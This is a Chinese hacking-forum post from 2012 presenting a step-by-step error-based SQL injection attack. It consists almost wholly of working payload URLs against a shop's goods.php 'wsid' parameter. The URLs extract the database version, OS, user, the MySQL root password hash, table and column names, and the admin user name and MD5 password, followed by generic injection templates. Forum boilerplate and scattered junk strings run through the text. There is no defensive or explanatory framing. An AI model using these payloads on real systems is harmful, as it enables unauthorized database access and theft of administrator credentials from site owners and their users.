找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2446|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号 ! T1 n' X2 S4 B6 k; @5 O$ u" s
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
. }: J  e' _4 Y0 v: E  F1 M. ~
4 @4 ]1 G" ?4 ?% m* L, u& U判断系统0 f3 R  w* Z" }
% }+ V) _, ?1 W9 f0 |0 ?0 Y6 u4 K9 g
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%232 ^7 r. U( Z+ f4 e7 e" U+ O7 }% V% g

9 Y+ n1 b1 ^6 Z$ p9 n9 H. p, t( Z
, R- O/ ?) S$ A% k+ L* o2 _/ g8 Q, W, _$ n4 p3 I
当前 user()
( ^! \6 z  y- u) L2 z1 V) u0 T9 ]: e0 p
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23, b" |( V/ t  B% ^9 q) n1 @
  b# ~4 q" d7 Y$ }

# j! B. a$ h- d
+ j7 D& P; D0 `4 k当前 database()
* _6 _# d7 Q4 U4 f1 qhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
9 F- v' @  |0 }
; w( N5 j/ y% f' E& @( ?0 y6 i9 p# F/ v: c; c) g' k; j: h
8 ^) P  d2 _+ y' z
1 O' N  n( M1 g/ X8 a. J( I, n* y
root hash
# O- J: t1 M, N# d
+ a2 j4 s) i0 n* bhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%234 k4 v* U8 }1 c9 ^6 V& T
4 e; y/ E- U' h+ X" }) `

; y. O8 Q0 c3 {8 f4 b4 N+ H+ B4 M/ K# s3 B& S
当前 数据库表名1 @) @% B4 q8 L+ I/ Q' q
9 d+ [  ?+ k4 R9 U8 ?$ \
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23" J8 f  o5 j) l2 W7 a! T3 P
, k( }0 `5 {3 J# J! p

; y9 t/ d4 N& s3 h3 Y/ m' V* ~, \% X! P$ s% G) |. b% i# i( Y
当前 数据库 user_name 字段, P' ]4 S$ E2 E# h: z) ^7 e$ f6 ^5 i9 s

6 H& I5 V  O+ thttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%237 t# l! }5 U( G1 k  D8 S
+ ~' c6 E. h& l$ c& P; J( V
当前 数据库 字段 password5 x- G+ G% Q* x7 h2 C% P
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%237 R" h. X' G, j) \
! a8 {" T# O& W! V. R+ ?! J! n

$ s' W& T% I: u. X2 J' u# w& b0 ]2 a, E4 X7 W
获得 admin passwd(md5)8 J0 a' t0 t. F
0 r% r$ ~4 d) x0 c1 `/ G8 g

) @. T# O% b2 ~* v/ ]( qhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
2 i1 t* t' a5 k/ w  H+ {# ]- n" j8 j& C! m0 h! H
报错注射
1 S$ L4 m3 q; H! w* `! KSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
! [/ e9 y8 G$ z( ~/ `% M+ J
' K  s7 f7 o! N0 O: ?SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)% R) a$ J/ z9 F+ c% }; V7 L9 ~0 _

, W4 `& W" _" ]" X; p8 [2 _6 \and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表